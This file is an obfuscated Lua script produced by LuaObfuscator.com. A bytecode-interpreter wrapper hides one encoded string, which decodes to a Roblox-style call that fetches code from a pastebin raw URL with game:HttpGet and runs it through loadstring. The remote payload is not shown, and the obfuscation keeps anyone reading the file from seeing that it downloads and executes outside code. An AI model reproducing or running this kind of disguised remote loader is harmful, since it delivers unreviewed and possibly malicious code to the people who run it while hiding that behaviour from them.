--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v121=0;local v122;while true do if (v121==0) then v122=v5(v90,v19);v19=nil;v121=1;end if (v121==1) then return v122;end end else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=0 -0 ;local v92;while true do if (v91==(0 -0)) then v92=(v31/(((3 + 0) -1)^(v32-1)))%((4 -2)^(((v33-(1 -0)) -(v32-(620 -(555 + (1129 -(68 + 997)))))) + (932 -(857 + (1344 -(226 + 1044)))))) ;return v92-(v92%(569 -(367 + 201))) ;end end else local v93=0;local v94;while true do if (v93==(927 -(214 + 713))) then v94=((4 -3) + 1)^(v32-(1 + 0)) ;return (((v31%(v94 + v94))>=v94) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=117 -(32 + 85) ;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=958 -(892 + 65) ;end if (v34==((3 -1) -1)) then return v35;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(351 -(87 + 263))) then return (v38 * (436 -(67 + 113))) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (4 -(954 -(802 + 150))) );v18=v18 + 2 + 0 ;v36=3 -2 ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((2189 -1188) -(915 + 82)) ;v39=2 -(1 + 0) ;end if (v39==((1 -0) + 0)) then return (v43 * (22064430 -5287214)) + (v42 * (66723 -(1069 + 118))) + (v41 * (580 -324)) + v40 ;end end end local function v24() local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if ((794 -(368 + 423))==v44) then if (v49==(0 -0)) then if (v48==((784 -(745 + 21)) -(10 + 8))) then return v50 * (0 -0) ;else v49=(153 + 290) -(416 + (123 -97)) ;v47=0 -0 ;end elseif (v49==((2418 -1539) + 460 + 708)) then return ((v48==(0 -0)) and (v50 * ((439 -(145 + 293))/((1686 -1256) -(44 + 386))))) or (v50 * NaN) ;end return v8(v50,v49-(2509 -(998 + 488)) ) * (v47 + (v48/((1 + 1)^(1 + 42 + 9)))) ;end if (v44==(772 -(201 + 571))) then v45=v23();v46=v23();v44=1139 -(116 + 1022) ;end if (((13 -9) -3)==v44) then v47=1 + 0 + 0 ;v48=(v20(v46,3 -2 ,71 -51 ) * ((861 -(814 + (1792 -(760 + 987))))^32)) + v45 ;v44=4 -2 ;end if (v44==2) then v49=v20(v46,2 + 19 ,11 + 20 );v50=((v20(v46,917 -(261 + 624) )==(1 -0)) and  -(1081 -((2075 -(87 + 968)) + 60))) or (1424 -((2543 -(1789 + 124)) + (3490 -2697))) ;v44=9 -6 ;end end end local function v25(v51) local v52;if  not v51 then v51=v23();if (v51==(0 + 0)) then return "";end end v52=v3(v16,v18,(v18 + v51) -(2 -1) );v18=v18 + v51 ;local v53={};for v70=1414 -(447 + 966) , #v52 do v53[v70]=v2(v1(v3(v52,v70,v70)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102) local v95=(function() return 1985 -(1266 + 719) ;end)();local v96=(function() return;end)();local v98=(function() return;end)();while true do if (v95==(0 -0)) then local v127=(function() return 166 -(122 + 44) ;end)();local v128=(function() return;end)();while true do if (v127==(603 -(268 + 335))) then v128=(function() return 290 -(60 + 230) ;end)();while true do if (v128==0) then v96=(function() return v97();end)();v98=(function() return nil;end)();v128=(function() return 573 -(426 + 146) ;end)();end if (v128==1) then v95=(function() return  #"]";end)();break;end end break;end end end if (v95~= #"~") then else if (v96== #"~") then v98=(function() return v97()~=(0 + 0) ;end)();elseif (v96==(6 -4)) then v98=(function() return v99();end)();elseif (v96== #"19(") then v98=(function() return v100();end)();end v101[v102]=(function() return v98;end)();break;end end return v95,v96,v97,v98,v99,v100,v101,v102;end;end)();local v55=(function() return function(v103,v104,v105,v106,v107,v108,v109,v110,v111) local v112=(function() return 0;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v112==(0 + 0)) then v103=(function() return 0;end)();v104=(function() return nil;end)();v112=(function() return 1457 -(282 + 1174) ;end)();end if (v112==(812 -(569 + 242))) then local v130=(function() return 0 -0 ;end)();while true do if (v130~=0) then else while true do if (v103~=(0 + 0)) then else v104=(function() return v105();end)();if (v106(v104, #"/", #"}")==0) then local v161=(function() return 65 -(30 + 35) ;end)();local v162=(function() return;end)();local v163=(function() return;end)();local v164=(function() return;end)();local v165=(function() return;end)();while true do if (v161~=(1 + 0)) then else local v187=(function() return 1024 -(706 + 318) ;end)();while true do if (v187~=(1251 -(721 + 530))) then else v164=(function() return nil;end)();v165=(function() return nil;end)();v187=(function() return 1;end)();end if (v187~=(3 -2)) then else v161=(function() return 2;end)();break;end end end if (v161~=(1273 -(945 + 326))) then else while true do if (v162==0) then local v192=(function() return 0 -0 ;end)();local v193=(function() return;end)();while true do if (v192==(0 + 0)) then v193=(function() return 0 -0 ;end)();while true do if (v193==(701 -(271 + 429))) then v162=(function() return  #" ";end)();break;end if (v193==0) then v163=(function() return v106(v104,2 + 0 , #"-19");end)();v164=(function() return v106(v104, #".com",326 -(53 + 267) );end)();v193=(function() return 1 + 0 ;end)();end end break;end end end if (v162== #">") then local v194=(function() return 413 -(15 + 398) ;end)();local v195=(function() return;end)();while true do if (v194~=0) then else v195=(function() return 1500 -(1408 + 92) ;end)();while true do if (v195~=(0 -0)) then else v165=(function() return {v107(),v107(),nil,nil};end)();if (v163==(1086 -(461 + 625))) then local v200=(function() return 0 + 0 ;end)();local v201=(function() return;end)();while true do if ((1288 -(993 + 295))~=v200) then else v201=(function() return 0 + 0 ;end)();while true do if (v201==(1171 -(418 + 753))) then v165[ #"nil"]=(function() return v107();end)();v165[ #"0313"]=(function() return v107();end)();break;end end break;end end elseif (v163== #">") then v165[ #"91("]=(function() return v108();end)();elseif (v163==(1 + 1)) then v165[ #"91("]=(function() return v108() -((1 + 1)^16) ;end)();elseif (v163== #"asd") then local v208=(function() return 0 + 0 ;end)();local v209=(function() return;end)();while true do if (v208==(0 + 0)) then v209=(function() return 529 -(406 + 123) ;end)();while true do if (v209~=(738 -(542 + 196))) then else v165[ #"91("]=(function() return v108() -((1771 -(1749 + 20))^(4 + 12)) ;end)();v165[ #"0313"]=(function() return v107();end)();break;end end break;end end end v195=(function() return 1;end)();end if ((1 + 0)==v195) then v162=(function() return 2;end)();break;end end break;end end end if ( #"gha"~=v162) then else if (v106(v164, #"xxx", #"xnx")~= #".") then else v165[ #"http"]=(function() return v109[v165[ #"xnxx"]];end)();end v110[v111]=(function() return v165;end)();break;end if ((1 + 1)==v162) then local v197=(function() return 0 -0 ;end)();local v198=(function() return;end)();while true do if (v197==(1322 -(1249 + 73))) then v198=(function() return 0 -0 ;end)();while true do if ((0 + 0)==v198) then if (v106(v164, #":", #".")~= #"!") then else v165[407 -(118 + 287) ]=(function() return v109[v165[1147 -(466 + 679) ]];end)();end if (v106(v164,4 -2 ,5 -3 )== #"/") then v165[ #"91("]=(function() return v109[v165[ #"gha"]];end)();end v198=(function() return 2 -1 ;end)();end if ((1901 -(106 + 1794))==v198) then v162=(function() return  #"91(";end)();break;end end break;end end end end break;end if (v161~=(0 + 0)) then else local v188=(function() return 377 -(142 + 235) ;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 0 -0 ;end)();while true do if ((0 + 0)==v189) then v162=(function() return 977 -(553 + 424) ;end)();v163=(function() return nil;end)();v189=(function() return 1 + 0 ;end)();end if (v189==1) then v161=(function() return 2 -1 ;end)();break;end end break;end end end end end break;end end return v103,v104,v105,v106,v107,v108,v109,v110,v111;end end end end end;end)();local v56=(function() return function(v113,v114,v115) local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();while true do if (v116==(0 -0)) then v117=(function() return 114 -(4 + 110) ;end)();while true do if (v117==(584 -(57 + 527))) then local v131=(function() return 1427 -(41 + 1386) ;end)();while true do if ((103 -(17 + 86))~=v131) then else v113[v114-#"|" ]=(function() return v115();end)();return v113,v114,v115;end end end end break;end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v72= #".",v61 do FlatIdent_12703,Type,v21,Cons,v24,v25,v62,v72=(function() return v54(FlatIdent_12703,Type,v21,Cons,v24,v25,v62,v72);end)();end v60[ #"gha"]=(function() return v21();end)();for v73= #">",v23() do FlatIdent_4CC24,Descriptor,v21,v20,v22,v23,v62,v57,v73=(function() return v55(FlatIdent_4CC24,Descriptor,v21,v20,v22,v23,v62,v57,v73);end)();end for v74= #"|",v23() do v58,v74,v28=(function() return v56(v58,v74,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[2 -1 ];local v68=v64[1 + 1 ];local v69=v64[14 -11 ];return function(...) local v75=v67;local v76=v68;local v77=v69;local v78=v27;local v79=754 -((698 -459) + 514) ;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -((1854 -524) -(87 + 710 + 532)) ;local v84={};local v85={};for v118=0 + 0 ,v83 do if (v118>=v77) then v81[v118-v77 ]=v82[v118 + (612 -((871 -269) + 9)) ];else v85[v118]=v82[v118 + 1 + (806 -(118 + 688)) ];end end local v86=(v83-v77) + (2 -1) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1203 -(373 + 829) ];if ((4755>3428) and (v88<=(737 -(476 + 255)))) then if ((1381<=2369) and (v88<=(949 -(245 + 702)))) then if (v88<=0) then do return;end elseif (v88>(1131 -((417 -(25 + 23)) + 761))) then local v132=0 + 0 ;local v133;while true do if (v132==(0 + 0)) then v133=v87[442 -(382 + 58) ];v85[v133]=v85[v133](v13(v85,v133 + (1 -0) ,v80));break;end end else local v134=0 -0 ;local v135;local v136;local v137;local v138;while true do if (v134==(3 -1)) then for v182=v135,v80 do v138=v138 + (239 -(64 + 174)) ;v85[v182]=v136[v138];end break;end if ((v134==(1 + 0)) or (4843==4084)) then v80=(v137 + v135) -(1 -0) ;v138=336 -(144 + 192) ;v134=218 -(42 + 34 + 140) ;end if ((4669>363) and (v134==(0 + 0))) then v135=v87[216 -(22 + 192) ];v136,v137=v78(v85[v135](v13(v85,v135 + 1 + 0 ,v87[2 + (1887 -(927 + 959)) ])));v134=1;end end end elseif (v88<=(1508 -(363 + 1141))) then if (v88>3) then v85[v87[1582 -(1183 + 397) ]]=v87[8 -5 ];else local v141=0 + 0 ;local v142;local v143;while true do if ((v141==(1 + 0)) or (1877>=3138)) then v85[v142 + ((6660 -4684) -(1913 + 62)) ]=v143;v85[v142]=v143[v87[3 + 1 ]];break;end if (v141==(0 -0)) then v142=v87[1935 -(565 + 1368) ];v143=v85[v87[11 -8 ]];v141=1662 -(1477 + (916 -(16 + 716))) ;end end end elseif (v88>(11 -6)) then local v144=0 -0 ;local v145;local v146;while true do if (v144==1) then v85[v145 + 1 ]=v146;v85[v145]=v146[v87[4 + 0 ]];break;end if ((4742>=3626) and (v144==(856 -(564 + 292)))) then v145=v87[2 -0 ];v146=v85[v87[(15 -7) -(102 -(11 + 86)) ]];v144=1;end end else local v147=0;local v148;local v149;local v150;local v151;while true do if (v147==(305 -(244 + 60))) then v80=(v150 + v148) -(2 -1) ;v151=0 + 0 ;v147=1 + 1 ;end if ((v147==((12 -7) -3)) or (4540==916)) then for v185=v148,v80 do local v186=476 -(41 + (720 -(175 + 110))) ;while true do if (v186==0) then v151=v151 + 1 + 0 ;v85[v185]=v149[v151];break;end end end break;end if (v147==(1001 -(938 + 63))) then v148=v87[(4 -2) + 0 ];v149,v150=v78(v85[v148](v13(v85,v148 + ((5553 -4427) -(936 + 189)) ,v87[3])));v147=1 + 0 ;end end end elseif ((v88<=(3 + 6)) or (1156>4345)) then if (v88<=(1620 -(1565 + 48))) then v85[v87[767 -(574 + 191) ]]();elseif (v88>((1803 -(503 + 1293)) + 1)) then v85[v87[2 + (0 -0) ]]();else local v152=1138 -(566 + 216 + 356) ;local v153;while true do if (v152==0) then v153=v87[269 -((1237 -(810 + 251)) + 91) ];v85[v153]=v85[v153](v13(v85,v153 + (2 -1) ,v80));break;end end end elseif (v88<=((11 + 4) -4)) then if (v88==(1102 -(975 + 117))) then v85[v87[(577 + 1300) -(157 + 1718) ]]=v66[v87[3 + 0 ]];else do return;end end elseif (v88>(42 -(28 + 2))) then v85[v87[6 -4 ]]=v66[v87[1021 -(697 + 321) ]];else v85[v87[2]]=v87[7 -4 ];end v79=v79 + (940 -(714 + 225)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F766A5A6B4155317400083O00120D3O00013O00120D000100023O002006000100010003001204000300044O0005000100034O00085O00022O00073O000100016O00017O00",v9(),...);
